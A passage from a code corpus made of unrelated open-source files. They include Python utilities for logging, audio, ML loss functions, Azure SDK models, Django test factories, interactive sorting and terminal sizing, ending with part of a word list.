# step = N_SAMPLES * frequency // SAMPLE_RATE
# for i in range(0, PERIOD_SIZE):
# buf[i] = wave[(step * i * N_SAMPLES // PERIOD_SIZE) % N_SAMPLES]
# return buf
def make_wave(wave, frequency):
    """Resample one stored wavetable cycle at `frequency`, producing
    PERIOD_SIZE samples suitable for one ALSA period."""
    step = N_SAMPLES * frequency // SAMPLE_RATE
    return [wave[(step * i * N_SAMPLES // PERIOD_SIZE) % N_SAMPLES]
            for i in range(PERIOD_SIZE)]
if __name__ == '__main__':
main()
| zmarvel/playground | sound/testplay.py | Python | mit | 3,152 |
#!/usr/bin/env python
# coding: utf-8
import logging
import config
def get_common_logger(name='common', logfile=None):
    '''
    args: name (str): logger name
          logfile (str): log file, use stream handler (stdout) as default.
    return:
        logger obj
    '''
    logger = logging.getLogger(name)
    logger.setLevel(config.LOG_LEVEL)
    # File handler when a path is given, otherwise log to the stream.
    handler = logging.FileHandler(logfile) if logfile else logging.StreamHandler()
    fmt = ('%(asctime)s - %(name)s - %(levelname)s - %(filename)s - '
           '%(funcName)s - %(lineno)s - %(message)s')
    handler.setFormatter(logging.Formatter(fmt))
    logger.addHandler(handler)
    # Stop logger propagate, forbiden duplicate log.
    # NOTE(review): calling this twice with the same name still attaches a
    # second handler and duplicates output -- confirm callers use it once.
    logger.propagate = False
    return logger
# Shared module-level logger for callers that do not need a custom name.
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
    # Smoke test: emit one debug record when run directly.
    COMMON_LOGGER.debug('test')
| WisZhou/websocket_messager | utils.py | Python | mit | 904 |
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
class NegativeSamplingFunction(function.Function):
    """Negative sampling loss function object.

    Scores each input row of ``x`` against its positive target word plus
    ``sample_size`` sampled negatives from ``sampler``; see the
    module-level ``negative_sampling`` docstring for the objective.
    """
    def __init__(self, sampler, sample_size):
        # sampler: callable mapping a shape to an integer array of word
        # ids drawn from the word distribution.
        self.sampler = sampler
        self.sample_size = sample_size
    def _make_samples(self, t):
        """Populate ``self.samples`` with shape (batch, sample_size + 1);
        column 0 holds the positive targets ``t``.  Skipped if samples
        were preset (used by the tests)."""
        if hasattr(self, 'samples'):
            return self.samples  # for testing
        size = int(t.shape[0])
        # first one is the positive, and others are sampled negatives
        samples = self.sampler((size, self.sample_size + 1))
        samples[:, 0] = t
        self.samples = samples
    def check_type_forward(self, in_types):
        """Validate dtypes/ranks of the (x, t, W) inputs."""
        type_check.expect(in_types.size() == 3)
        x_type, t_type, w_type = in_types
        type_check.expect(
            x_type.dtype == numpy.float32,
            x_type.ndim == 2,
            t_type.dtype == numpy.int32,
            t_type.ndim == 1,
            x_type.shape[0] == t_type.shape[0],
            w_type.dtype == numpy.float32,
            w_type.ndim == 2,
        )
    def forward_cpu(self, inputs):
        """CPU forward: softplus of each sample's score, with the positive
        column's score negated, summed into a scalar float32 loss."""
        x, t, W = inputs
        self._make_samples(t)
        loss = numpy.float32(0.0)
        for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
            w = W[k]
            f = w.dot(ix)
            f[0] *= -1  # positive sample
            # logaddexp(f, 0) == log(1 + exp(f)), numerically stable.
            loss += numpy.sum(numpy.logaddexp(f, 0))
        return numpy.array(loss, numpy.float32),
    def forward_gpu(self, inputs):
        """GPU forward: one kernel computes w.x per (row, sample) into
        self.wx, a second applies the sign-flipped softplus; the
        per-element losses are then summed on the device."""
        x, t, W = inputs
        n_in = x.shape[1]
        self._make_samples(t)
        self.wx = cuda.elementwise(
            'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
            '''
            T f = 0;
            for (int j = 0; j < c; ++j) {
              int x_ind[] = {(i / m), j};
              int w_ind[] = {k, j};
              f += x[x_ind] * W[w_ind];
            }
            wx = f;
            ''',
            'negative_sampling_wx'
        )(W, x, self.samples, n_in, self.sample_size + 1)
        y = cuda.elementwise(
            'T wx, int32 c, int32 m', 'T y',
            '''
            T f = wx;
            if (i % m == 0) {
              f = -f;
            }
            T loss;
            if (f < 0) {
              loss = __logf(1 + __expf(f));
            } else {
              loss = f + __logf(1 + __expf(-f));
            }
            y = loss;
            ''',
            'negative_sampling_forward'
        )(self.wx, n_in, self.sample_size + 1)
        # TODO(okuta): merge elementwise
        loss = cuda.cupy.sum(y)
        return loss,
    def backward_cpu(self, inputs, grads):
        """CPU backward: recompute per-sample scores and distribute the
        sigmoid gradients into gx and the sampled rows of gW.  The target
        input t receives no gradient (None)."""
        x, t, W = inputs
        gloss, = grads
        gx = numpy.zeros_like(x)
        gW = numpy.zeros_like(W)
        for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
            w = W[k]
            f = w.dot(ix)
            # g == -y * gloss / (1 + exp(yf))
            f[0] *= -1
            g = gloss / (1 + numpy.exp(-f))
            g[0] *= -1
            gx[i] = g.dot(w)
            for ik, ig in six.moves.zip(k, g):
                gW[ik] += ig * ix
        return gx, None, gW
    def backward_gpu(self, inputs, grads):
        """GPU backward: kernels compute the per-sample gradient factor g
        from the cached self.wx, then accumulate gx and (via atomicAdd,
        since sampled rows can repeat) gW."""
        cupy = cuda.cupy
        x, t, W = inputs
        gloss, = grads
        n_in = x.shape[1]
        g = cuda.elementwise(
            'T wx, raw T gloss, int32 m', 'T g',
            '''
            T y;
            if (i % m == 0) {
              y = 1;
            } else {
              y = -1;
            }
            g = -y * gloss[0] / (1.0f + __expf(wx * y));
            ''',
            'negative_sampling_calculate_g'
        )(self.wx, gloss, self.sample_size + 1)
        gx = cupy.zeros_like(x)
        cuda.elementwise(
            'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
            '''
            int d = i / c;
            T w = 0;
            for (int j = 0; j < m; ++j) {
              w += g[d * m + j] * W[k[d * m + j] * c + i % c];
            }
            gx = w;
            ''',
            'negative_sampling_calculate_gx'
        )(g, W, self.samples, n_in, self.sample_size + 1, gx)
        gW = cupy.zeros_like(W)
        cuda.elementwise(
            'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
            '''
            T gi = g;
            for (int j = 0; j < c; ++j) {
              atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
            }
            ''',
            'negative_sampling_calculate_gw'
        )(g, x, self.samples, n_in, self.sample_size + 1, gW)
        return gx, None, gW
def negative_sampling(x, t, W, sampler, sample_size):
    """Negative sampling loss function.
    In natural language processing, especially language modeling, the number of
    vocabulary is very large.
    Therefore, you need to spend a lot of time to calculate the gradient of the
    embedding matrix.
    Instead, in negative sampling trick, you only need to calculate the
    gradient for a few sampled negative examples.
    The objective function is below:
    .. math::
       f(x, p) = \\log \\sigma(x^\\top w_p) + \\
       k E_{i \\sim P(i)}[\\log \\sigma(- x^\\top w_i)],
    where :math:`\\sigma(\\cdot)` is a sigmoid function, :math:`w_i` is the
    weight vector for the word :math:`i`, and :math:`p` is a positive example.
    It is approximated with :math:`k` examples :math:`N` sampled from
    probability :math:`P(i)`, like this:
    .. math::
       f(x, p) \\approx \\log \\sigma(x^\\top w_p) + \\
       \\sum_{n \\in N} \\log \\sigma(-x^\\top w_n).
    Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
    This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
    :math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
    a hyper-parameter, and :math:`Z` is the normalization constant.
    Args:
        x (~chainer.Variable): Batch of input vectors.
        t (~chainer.Variable): Vector of ground truth labels.
        W (~chainer.Variable): Weight matrix.
        sampler (~types.FunctionType): Sampling function. It takes a shape and
            returns an integer array of the shape. Each element of this array
            is a sample from the word distribution.
            A :class:`~chainer.utils.WalkerAlias` object built with the power
            distribution of word frequency is recommended.
        sample_size (int): Number of samples.
    See: `Distributed Representations of Words and Phrases and their\
         Compositionality <http://arxiv.org/abs/1310.4546>`_
    .. seealso:: :class:`~chainer.links.NegativeSampling`.
    """
    # Instantiate the function object and immediately apply it to (x, t, W).
    return NegativeSamplingFunction(sampler, sample_size)(x, t, W)
| AlpacaDB/chainer | chainer/functions/loss/negative_sampling.py | Python | mit | 6,667 |
# ncd-dcb.py
#
# Use Cilibrasi and Vitanyi's Normalized Compression Distance
# to cluster a randomly chosen sample of entries from the
# Dictionary of Canadian Biography volume 1
#
# wjt
# http://digitalhistoryhacks.blogspot.com
#
# 26 jun 2007
import bz2
import random
# Root directory holding the plain-text DCB volume 1 entries (<id>.txt files).
# Raw string: the original relied on '\D', '\H', etc. not being recognized
# escape sequences, which is fragile (and a DeprecationWarning in Python 3).
pathstring = r'C:\Documents and Settings\HP_Administrator\My Documents\digital-history-datasets\DCB-txt\DCB-v01-txt'
# Function to calculate the NCD of two files
def ncd(filex, filey):
    """Return the Normalized Compression Distance between two files.

    NCD(x, y) = (C(xy) - min(C(x), C(y))) / max(C(x), C(y)), where C() is
    the bzip2-compressed size.  Values near 0 mean "very similar", values
    near 1 mean "unrelated" (Cilibrasi & Vitanyi, 2005).

    Fixes over the original: files are opened in binary mode (text mode
    can alter byte counts on Windows, skewing the compressed sizes) and
    are closed deterministically via ``with``.
    """
    with open(filex, 'rb') as fx:
        xbytes = fx.read()
    with open(filey, 'rb') as fy:
        ybytes = fy.read()
    cx = len(bz2.compress(xbytes))
    cy = len(bz2.compress(ybytes))
    cxy = len(bz2.compress(xbytes + ybytes))
    # Normalize by the larger of the two individual compressed sizes.
    return (cxy - min(cx, cy)) / float(max(cx, cy))
# Randomly select 100 biographies from DCB vol 1 (nos. 34123-34714 inclusive).
# range() excludes its stop value, so 34715 is needed to make entry 34714
# eligible (the original range(34123, 34714) silently dropped it).
volume1 = range(34123, 34715)
selection = random.sample(volume1, 100)
# For each unique (unordered) pair, calculate NCD and write one CSV-ish
# line per pair: "id1, id2, distance".  ``with`` guarantees the file is
# flushed and closed even if ncd() raises midway.
with open('ncd-dcb.txt', 'w') as outfile:
    for i in range(len(selection) - 1):
        print(i)  # progress indicator: outer-loop index
        # The left-hand file path is loop-invariant; build it once.
        fx = pathstring + '\\' + str(selection[i]) + '.txt'
        for j in selection[i + 1:]:
            fy = pathstring + '\\' + str(j) + '.txt'
            outfile.write(str(selection[i]) + ", " + str(j) + ", " + str(ncd(fx, fy)) + "\n")
| williamjturkel/Digital-History-Hacks--2005-08- | ncd-dcb.py | Python | mit | 1,364 |
from __future__ import unicode_literals
from pre_commit.languages import helpers
from pre_commit.xargs import xargs
ENVIRONMENT_DIR = None
get_default_version = helpers.basic_get_default_version
healthy = helpers.basic_healthy
install_environment = helpers.no_install
def run_hook(repo_cmd_runner, hook, file_args):
    """Execute a script-language hook.

    The first element of the hook's command is a path relative to the
    repository checkout, so it is prefixed with the runner's directory;
    the staged filenames are then fanned out over the command via xargs.
    """
    base_cmd = helpers.to_cmd(hook)
    script = repo_cmd_runner.prefix_dir + base_cmd[0]
    return xargs((script,) + base_cmd[1:], file_args)
| Lucas-C/pre-commit | pre_commit/languages/script.py | Python | mit | 444 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class AvailabilitySet(Resource):
    """Create or update availability set parameters.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Resource Id
    :vartype id: str
    :ivar name: Resource name
    :vartype name: str
    :ivar type: Resource type
    :vartype type: str
    :param location: Resource location
    :type location: str
    :param tags: Resource tags
    :type tags: dict
    :param platform_update_domain_count: Update Domain count.
    :type platform_update_domain_count: int
    :param platform_fault_domain_count: Fault Domain count.
    :type platform_fault_domain_count: int
    :param virtual_machines: A list of references to all virtual machines in
     the availability set.
    :type virtual_machines: list of :class:`SubResource
     <azure.mgmt.compute.models.SubResource>`
    :ivar statuses: The resource status information.
    :vartype statuses: list of :class:`InstanceViewStatus
     <azure.mgmt.compute.models.InstanceViewStatus>`
    :param managed: If the availability set supports managed disks.
    :type managed: bool
    :param sku: Sku of the availability set
    :type sku: :class:`Sku <azure.mgmt.compute.models.Sku>`
    """

    # msrest validation rules: server-populated fields are read-only, and
    # 'location' must always be supplied by the caller.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
        'statuses': {'readonly': True},
    }

    # Maps each Python attribute to its key in the REST payload; keys with
    # a 'properties.' prefix are nested under the resource's properties bag.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'platform_update_domain_count': {'key': 'properties.platformUpdateDomainCount', 'type': 'int'},
        'platform_fault_domain_count': {'key': 'properties.platformFaultDomainCount', 'type': 'int'},
        'virtual_machines': {'key': 'properties.virtualMachines', 'type': '[SubResource]'},
        'statuses': {'key': 'properties.statuses', 'type': '[InstanceViewStatus]'},
        'managed': {'key': 'properties.managed', 'type': 'bool'},
        'sku': {'key': 'sku', 'type': 'Sku'},
    }

    def __init__(self, location, tags=None, platform_update_domain_count=None, platform_fault_domain_count=None, virtual_machines=None, managed=None, sku=None):
        # 'location' and 'tags' belong to the Resource base class.
        super(AvailabilitySet, self).__init__(location=location, tags=tags)
        self.platform_update_domain_count = platform_update_domain_count
        self.platform_fault_domain_count = platform_fault_domain_count
        self.virtual_machines = virtual_machines
        # Read-only: populated by the service on responses, never by callers.
        self.statuses = None
        self.managed = managed
        self.sku = sku
| rjschwei/azure-sdk-for-python | azure-mgmt-compute/azure/mgmt/compute/models/availability_set.py | Python | mit | 3,239 |
from pydub import *
class AudioMerger:
    """Overlays spoken countdown/announcement clips onto a music track.

    Voice clips are loaded from ``voices/<tag>.wav`` and boosted by a few
    dB so they remain audible over the music.  All positions passed to the
    public methods are in seconds; pydub works in milliseconds internally.
    """

    # File-name stems of the voice clips; indices 0-4 are the final
    # five-second countdown ("one" .. "five").
    voice_tags = ["one", "two", "three", "four", "five", "ten", "RUN", "relax", "completed"]

    def __init__(self, music):
        self.music = music
        self.additionalGain = 8  # dB boost applied to every voice clip
        self.voices = {}
        for tag in self.voice_tags:
            clip = AudioSegment.from_file('voices/' + tag + '.wav')
            self.voices[tag] = clip + self.additionalGain

    def addCountdown(self, startTime, isRun=True):
        """Overlay a "ten ... five four three two one RUN/relax" countdown
        ending at ``startTime`` seconds."""
        # "five" .. "one" land at startTime-5 .. startTime-1 respectively.
        for secs_before in range(1, 6):
            clip = self.voices[self.voice_tags[secs_before - 1]]
            self.music = self.music.overlay(clip, position=(startTime - secs_before) * 1000)
        self.music = self.music.overlay(self.voices["ten"], position=(startTime - 10) * 1000)
        announcement = "RUN" if isRun else "relax"
        self.music = self.music.overlay(self.voices[announcement], position=startTime * 1000)

    def addCompleted(self, startTimeSec):
        """Overlay the "completed" announcement at ``startTimeSec`` seconds."""
        self.music = self.music.overlay(self.voices["completed"], position=(startTimeSec * 1000))

    def exportMusic(self, fname):
        """Write the mixed track to ``<fname>.mp3``."""
        self.music.export(fname + ".mp3", format="mp3")
| gyimothilaszlo/interval-music-maker | AudioMerger.py | Python | mit | 1,005 |
import factory
from ...models import Dashboard, Link, ModuleType, Module
from ....organisation.tests.factories import NodeFactory, NodeTypeFactory
# factory_boy model factories for dashboard tests.  Sequences guarantee
# unique slugs/names per created instance; SubFactory builds the related
# object on demand.
class DashboardFactory(factory.DjangoModelFactory):
    # Default Dashboard: published, with a unique sequential slug.
    class Meta:
        model = Dashboard
    status = 'published'
    title = "title"
    slug = factory.Sequence(lambda n: 'slug%s' % n)
class LinkFactory(factory.DjangoModelFactory):
    # Transaction-type Link attached to a fresh Dashboard by default.
    class Meta:
        model = Link
    url = factory.Sequence(lambda n: 'https://www.gov.uk/link-%s' % n)
    title = 'Link title'
    link_type = 'transaction'
    dashboard = factory.SubFactory(DashboardFactory)
class ModuleTypeFactory(factory.DjangoModelFactory):
    # ModuleType with a unique name and an empty JSON schema.
    class Meta:
        model = ModuleType
    name = factory.Sequence(lambda n: 'name %s' % n)
    schema = {}
class ModuleFactory(factory.DjangoModelFactory):
    # Module wired to a fresh ModuleType/Dashboard; ``order`` follows the
    # creation sequence so modules sort deterministically.
    class Meta:
        model = Module
    type = factory.SubFactory(ModuleTypeFactory)
    dashboard = factory.SubFactory(DashboardFactory)
    slug = factory.Sequence(lambda n: 'slug{}'.format(n))
    title = 'title'
    info = []
    options = {}
    order = factory.Sequence(lambda n: n)
# Organisation node-type factories: the fixed ``name`` identifies the level.
class DepartmentTypeFactory(NodeTypeFactory):
    name = 'department'
class AgencyTypeFactory(NodeTypeFactory):
    name = 'agency'
class ServiceTypeFactory(NodeTypeFactory):
    name = 'service'
# Organisation node factories forming a service -> agency -> department tree.
class DepartmentFactory(NodeFactory):
    name = factory.Sequence(lambda n: 'department-%s' % n)
    typeOf = factory.SubFactory(DepartmentTypeFactory)
class AgencyFactory(NodeFactory):
    name = factory.Sequence(lambda n: 'agency-%s' % n)
    typeOf = factory.SubFactory(AgencyTypeFactory)
class AgencyWithDepartmentFactory(AgencyFactory):
    # Agency that also creates its parent Department.
    parent = factory.SubFactory(DepartmentFactory)
class ServiceFactory(NodeFactory):
    # Service nested under an agency (which itself has a department).
    parent = factory.SubFactory(AgencyWithDepartmentFactory)
    name = factory.Sequence(lambda n: 'service-%s' % n)
    typeOf = factory.SubFactory(ServiceTypeFactory)
| alphagov/stagecraft | stagecraft/apps/dashboards/tests/factories/factories.py | Python | mit | 1,931 |
#!/usr/bin/env python3
'''A simple implementation of a sorting algorithm, meant to allow
people to manually rank a list of items using whatever subjective or
objective criteria they want.
This program can be called as a script and used interactively. You
can provide the list of things to sort as command line arguments, or
if there are no arguments provided, you can provide the list in stdin,
one item per line.
Example run:
$ ./sort.py 'ice cream' falafel hamburgers pizza
Which is greater, falafel or ice cream (<, =, or >)? <
Which is greater, hamburgers or ice cream (<, =, or >)? <
Which is greater, hamburgers or falafel (<, =, or >)? >
Which is greater, pizza or hamburgers (<, =, or >)? >
Which is greater, pizza or ice cream (<, =, or >)? <
* ice cream
* pizza
* hamburgers
* falafel
Author: Adam Mesha <adam@mesha.org>
License: MIT
'''
from functools import cmp_to_key
class memoize:
    '''Decorator caching a function's result per positional-argument tuple.

    Guarantees the wrapped function runs at most once per distinct input
    pair -- essential here, since each call asks a human to compare items
    and we must never pose the same question twice.
    '''
    def __init__(self, func):
        self.func = func
        self.cache = {}

    def __call__(self, *args):
        try:
            return self.cache[args]
        except KeyError:
            result = self.cache[args] = self.func(*args)
            return result
@memoize
def cmpfunc(a, b):
    """Interactively ask the user to compare items *a* and *b*.

    Returns -1, 0, or 1 for a < b, a == b, a > b respectively.
    Re-prompts until the reply is exactly one of '<', '=' or '>'.

    Bug fix: the original tested ``result not in '<=>'``, which is a
    substring check -- it wrongly accepted '' (``'' in '<=>'`` is True,
    so just pressing Enter meant '<') as well as '<=' and '=>'.
    """
    prompt = 'Which is greater, {a} or {b} (<, =, or >)? '.format(a=a, b=b)
    result = None
    while result not in ('<', '=', '>'):
        result = input(prompt).strip()
    return '<=>'.index(result) - 1

keyfunc = cmp_to_key(cmpfunc)
def binary_insertion_sort(seq, keyfunc):
    '''Sort *seq* in place via insertion sort with binary search.

    O(n**2) element moves, but only O(n log n) key comparisons -- the
    right trade-off when each comparison is answered by a human.
    '''
    def shift_down(src, dst):
        # Bubble the element at index src leftwards until it sits at dst.
        while src > dst:
            seq[src], seq[src - 1] = seq[src - 1], seq[src]
            src -= 1

    for i in range(1, len(seq)):
        lo, hi = 0, i
        while lo < hi:
            mid = (lo + hi) // 2
            key_new, key_mid = keyfunc(seq[i]), keyfunc(seq[mid])
            if key_new == key_mid:
                # Equal keys: drop the element right after its match.
                # XXX this is not stable
                shift_down(i, mid + 1)
                break
            if key_new < key_mid:
                hi = mid
            else:  # >
                lo = mid + 1
        else:
            # Binary search converged (lo == hi): that's the insert slot.
            shift_down(i, lo)
class SortableWithHeuristic:
    """Pairs a value with a mutable numeric heuristic score used to guess
    its sorted position before any comparisons are made."""

    def __init__(self, val, heur):
        self.val = val
        self.heur = heur

    def __str__(self):
        return '{0}: {1}'.format(self.val, self.heur)

    def __repr__(self):
        return '{0}(val={1!r}, heur={2!r})'.format(
            type(self).__name__, self.val, self.heur)
def get_heuristic_func(val):
    """Prompt the user for an approximate numeric score for *val*.

    Keeps re-prompting until the reply parses as a float.
    """
    prompt = 'Give an approximate numeric score to item {}: '.format(val)
    while True:
        try:
            return float(input(prompt).strip())
        except ValueError:
            continue  # non-numeric reply; ask again
def heuristic_sort(seq, get_heuristic_func, cmpfunc):
    """Sort *seq* ascending in place, wrapping each element in a
    SortableWithHeuristic.

    Each item first receives a user-supplied numeric score via
    *get_heuristic_func*; the score gives a starting guess for the item's
    position, and *cmpfunc* comparisons then nudge it to its true place --
    so an accurate score minimizes the number of (human-answered)
    comparisons.
    """
    def swap(a, b):
        # Exchange the elements at indices a and b.
        seq[a], seq[b] = seq[b], seq[a]
    idx = 0
    while idx < len(seq):
        val = seq[idx]
        heur = get_heuristic_func(val)
        seq[idx] = SortableWithHeuristic(val, heur)
        # find the current location
        j = idx
        # First slide left to the position suggested by the score alone.
        while j > 0 and seq[j].heur < seq[j-1].heur:
            swap(j, j-1)
            j -= 1
        moved = False
        # Correct rightwards with real comparisons: cmpfunc(...) == 1
        # means seq[j] > seq[j+1], i.e. still out of order.
        while j < idx and cmpfunc(seq[j].val, seq[j+1].val) == 1:
            swap(j, j+1)
            j += 1
            moved = True
        if not moved:
            # Otherwise correct leftwards (-1 means seq[j] < seq[j-1]).
            while j > 0 and cmpfunc(seq[j].val, seq[j-1].val) == -1:
                swap(j, j-1)
                j -= 1
        # Re-fit the stored score so it is consistent with the scores of
        # the neighbours at the element's final position.
        if 0 < j < idx:
            seq[j].heur = (seq[j-1].heur + seq[j+1].heur) / 2
        elif idx > 0:
            if j == 0 and seq[j].heur > seq[j+1].heur:
                seq[j].heur = seq[j+1].heur - 1
            elif j == idx and seq[j].heur < seq[j-1].heur:
                seq[j].heur = seq[j-1].heur + 1
        idx += 1
def main():
    """Read items from argv (or stdin, one per line) and interactively
    rank them, printing the result best-first as a bullet list."""
    import sys
    items = list(sys.argv[1:])
    if not items:
        items = [line.strip() for line in sys.stdin.readlines()]
    heuristic_sort(items, get_heuristic_func, cmpfunc)
    # heuristic_sort orders ascending; print greatest first.
    print('\n'.join('* {}'.format(item) for item in reversed(items)))

if __name__ == '__main__':
    main()
| sagittarian/personal-sort | sort.py | Python | mit | 4,539 |
import click
from twentyfourhourvideo import video
@click.command(help='Plays a video.')
@click.argument('input', type=click.Path())
def main(input):
    # CLI entry point: ``input`` is the path argument supplied on the
    # command line; playback is delegated entirely to the video module.
    video.play(input)
| xsteadfastx/24hourvideo | twentyfourhourvideo/cli.py | Python | mit | 175 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, division
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
    """Return the console size as a ``(columns, rows)`` tuple.

    Works on Linux, OS X, Windows and cygwin (Windows); falls back to
    (80, 25) when every platform-specific probe fails.
    originally retrieved from:
    http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
    """
    os_name = platform.system()
    size = None
    if os_name == 'Windows':
        size = _get_terminal_size_windows()
    if size is None:
        # Deliberately not nested under the Windows branch:
        # needed for window's python in cygwin's xterm!
        size = _get_terminal_size_tput()
    if os_name in ['Linux', 'Darwin'] or os_name.startswith('CYGWIN'):
        size = _get_terminal_size_linux()
    if size is None:
        size = (80, 25)  # last-resort default
    return size
def _get_terminal_size_windows():
    """Query the Win32 console for (columns, rows) via ctypes.

    Uses GetConsoleScreenBufferInfo on the stderr handle.  Returns None
    when not on Windows or when the console query fails.

    Fix: the bare ``except:`` is narrowed to ``except Exception`` so
    KeyboardInterrupt/SystemExit are no longer swallowed; the failure
    path returns None explicitly.
    """
    try:
        from ctypes import windll, create_string_buffer
        # stdin handle is -10
        # stdout handle is -11
        # stderr handle is -12
        h = windll.kernel32.GetStdHandle(-12)
        csbi = create_string_buffer(22)
        res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
        if res:
            (bufx, bufy, curx, cury, wattr,
             left, top, right, bottom,
             maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
            # Visible window extent, not the (possibly larger) buffer size.
            sizex = right - left + 1
            sizey = bottom - top + 1
            return sizex, sizey
    except Exception:
        # Expected off-Windows: ImportError/AttributeError from ctypes.windll.
        pass
    return None
def _get_terminal_size_tput():
    """Ask the ``tput`` utility for (columns, rows); None on failure.

    Bug fix: the original called subprocess.check_call, which returns the
    process's *exit status* (0 on success), not its output -- so this
    function always reported a 0x0 terminal.  check_output captures the
    numbers tput actually prints.
    """
    # get terminal width
    # src: http://stackoverflow.com/questions/263890/
    # how-do-i-find-the-width-height-of-a-terminal-window
    try:
        cols = int(subprocess.check_output(shlex.split('tput cols')))
        rows = int(subprocess.check_output(shlex.split('tput lines')))
        return (cols, rows)
    except Exception:
        # tput missing, no TERM, or unparsable output: signal "unknown".
        return None
def _get_terminal_size_linux():
    """Return (columns, rows) on POSIX systems.

    Probe order: TIOCGWINSZ ioctl on stdin/stdout/stderr, then the
    controlling terminal, then the LINES/COLUMNS environment variables
    (defaulting to 25x80).  Always returns a tuple.
    """
    import os
    env = os.environ
    def ioctl_GWINSZ(fd):
        # Ask the kernel for the window size of the tty on *fd*;
        # returns a (rows, cols) tuple, or None if fd is not a tty.
        try:
            import fcntl, termios, struct, os
            cr = struct.unpack(b'hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
                                                  b'1234'))
        except:
            return
        return cr
    # Try the three standard streams first (any may be redirected).
    cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
    if not cr:
        # All streams redirected: ask the controlling terminal directly.
        try:
            fd = os.open(os.ctermid(), os.O_RDONLY)
            cr = ioctl_GWINSZ(fd)
            os.close(fd)
        except:
            pass
    if not cr:
        # Last resort: environment (values may be strings; int() below copes).
        cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
    # cr is (rows, cols); the public contract is (cols, rows).
    return int(cr[1]), int(cr[0])
| concordusapps/pytest-bench | pytest_bench/terminal.py | Python | mit | 2,626 |
"""Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python.platform.resource_loader import get_data_files_path
from tensorflow.python.platform.resource_loader import get_path_to_datafile
from tensorflow.python.platform.resource_loader import get_root_dir_with_all_resources
from tensorflow.python.platform.resource_loader import load_resource
from tensorflow.python.platform.resource_loader import readahead_file_path | ryfeus/lambda-packs | Keras_tensorflow_nightly/source2.7/tensorflow/tools/api/generator/api/resource_loader/__init__.py | Python | mit | 532 |
words = [
'abandon',
'ability',
'able',
'about',
'above',
'absent',
'absorb',
'abstract',
'absurd',
'abuse',
'access',
'accident',
'account',
'accuse',
'achieve',
'acid',
'acoustic',
'acquire',
'across',
'act',
'action',
'actor',
'actress',
'actual',
'adapt',
'add',
'addict',
'address',
'adjust',
'admit',
'adult',
'advance',
'advice',
'aerobic',
'affair',
'afford',
'afraid',
'again',
'age',
'agent',
'agree',
'ahead',
'aim',
'air',
'airport',
'aisle',
'alarm',
'album',
'alcohol',
'alert',
'alien',
'all',
'alley',
'allow',
'almost',
'alone',
'alpha',
'already',
'also',
'alter',
'always',
'amateur',
'amazing',
'among',
'amount',
'amused',
'analyst',
'anchor',
'ancient',
'anger',
'angle',
'angry',
'animal',
'ankle',
'announce',
'annual',
'another',
'answer',
'antenna',
'antique',
'anxiety',
'any',
'apart',
'apology',
'appear',
'apple',
'approve',
'april',
'arch',
'arctic',
'area',
'arena',
'argue',
'arm',
'armed',
'armor',
'army',
'around',
'arrange',
'arrest',
'arrive',
'arrow',
'art',
'artefact',
'artist',
'artwork',
'ask',
'aspect',
'assault',
'asset',
'assist',
'assume',
'asthma',
'athlete',
'atom',
'attack',
'attend',
'attitude',
'attract',
'auction',
'audit',
'august',
'aunt',
'author',
'auto',
'autumn',
'average',
'avocado',
'avoid',
'awake',
'aware',
'away',
'awesome',
'awful',
'awkward',
'axis',
'baby',
'bachelor',
'bacon',
'badge',
'bag',
'balance',
'balcony',
'ball',
'bamboo',
'banana',
'banner',
'bar',
'barely',
'bargain',
'barrel',
'base',
'basic',
'basket',
'battle',
'beach',
'bean',
'beauty',
'because',
'become',
'beef',
'before',
'begin',
'behave',
'behind',
'believe',
'below',
'belt',
'bench',
'benefit',
'best',
'betray',
'better',
'between',
'beyond',
'bicycle',
'bid',
'bike',
'bind',
'biology',
'bird',
'birth',
'bitter',
'black',
'blade',
'blame',
'blanket',
'blast',
'bleak',
'bless',
'blind',
'blood',
'blossom',
'blouse',
'blue',
'blur',
'blush',
'board',
'boat',
'body',
'boil',
'bomb',
'bone',
'bonus',
'book',
'boost',
'border',
'boring',
'borrow',
'boss',
'bottom',
'bounce',
'box',
'boy',
'bracket',
'brain',
'brand',
'brass',
'brave',
'bread',
'breeze',
'brick',
'bridge',
'brief',
'bright',
'bring',
'brisk',
'broccoli',
'broken',
'bronze',
'broom',
'brother',
'brown',
'brush',
'bubble',
'buddy',
'budget',
'buffalo',
'build',
'bulb',
'bulk',
'bullet',
'bundle',
'bunker',
'burden',
'burger',
'burst',
'bus',
'business',
'busy',
'butter',
'buyer',
'buzz',
'cabbage',
'cabin',
'cable',
'cactus',
'cage',
'cake',
'call',
'calm',
'camera',
'camp',
'can',
'canal',
'cancel',
'candy',
'cannon',
'canoe',
